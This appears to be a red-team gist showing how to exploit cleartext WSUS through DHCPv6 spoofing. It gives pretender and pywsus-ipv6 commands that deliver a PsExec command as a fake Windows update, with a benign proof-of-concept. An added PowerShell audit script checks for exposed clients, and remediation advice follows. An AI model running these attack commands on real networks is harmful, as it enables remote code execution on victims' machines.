@zimnyaa
Created October 10, 2022 12:33
Cleartext WSUS exploitation with DHCPv6 spoofing
# checking WSUS preferences
PS> reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate /v WUServer
PS> reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AU /v UseWUServer
### after setting up the attack, click the "Check for updates" button
### set up DHCPv6 spoofing
git clone https://github.com/RedTeamPentesting/pretender.git
cd pretender
sudo ./pretender -i eth0 --spoof wsus.lab.local
### setting up the IPv6 PyWSUS fork
git clone https://github.com/cr7pt0pl4gu3/pywsus-ipv6.git
cd pywsus-ipv6
sudo python3 pywsus.py --host '[fe80::394:b41c:206e:bce0]' --port 8530 --executable PsExec64.exe --command '/accepteula /s cmd.exe /c "echo a > C:\\poc2.txt"'
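
The two registry values queried at the top decide whether a client is exposed to this: UseWUServer set to 1 together with an http:// WUServer URL. The script below is an added audit example, not part of the original gist; the function names, the extra WUStatusServer value, and the sample URLs (built from the gist's hostname, with 8531 as a constructed HTTPS port) are assumptions.

```powershell
# Added example: flag WSUS client policy that fetches updates over cleartext HTTP.
function Test-WsusTransport {
    param([hashtable]$Policy)   # hashtable input so the logic can be exercised offline

    # UseWUServer must be 1 for the client to use the WUServer URL at all.
    if ($Policy.UseWUServer -ne 1) {
        return [pscustomobject]@{ Exposed = $false; Findings = @('UseWUServer is not 1') }
    }

    $findings = @()
    foreach ($name in 'WUServer', 'WUStatusServer') {
        $url = $Policy[$name]
        if ([string]::IsNullOrWhiteSpace($url)) { continue }

        $uri = $null
        if (-not [Uri]::TryCreate($url, [UriKind]::Absolute, [ref]$uri)) {
            $findings += "$name is not an absolute URL: $url"
        } elseif ($uri.Scheme -ne 'https') {
            # Anything but https means update metadata can be altered in transit.
            $findings += "$name is fetched over $($uri.Scheme): $url"
        }
    }
    [pscustomobject]@{ Exposed = ($findings.Count -gt 0); Findings = $findings }
}

# Reads the same keys as the reg query commands above (hypothetical helper).
function Get-WsusPolicy {
    $base = 'HKLM:\Software\Policies\Microsoft\Windows\WindowsUpdate'
    $wu = Get-ItemProperty -Path $base -ErrorAction SilentlyContinue
    $au = Get-ItemProperty -Path "$base\AU" -ErrorAction SilentlyContinue
    @{
        WUServer       = $wu.WUServer
        WUStatusServer = $wu.WUStatusServer
        UseWUServer    = $au.UseWUServer
    }
}

# Constructed sample policies, then the local host's real policy.
Test-WsusTransport @{ UseWUServer = 1; WUServer = 'http://wsus.lab.local:8530' }
Test-WsusTransport @{ UseWUServer = 1; WUServer = 'https://wsus.lab.local:8531' }
Test-WsusTransport (Get-WsusPolicy)
```

A host reported as exposed should have its WSUS policy moved to an https:// URL backed by a certificate the clients trust.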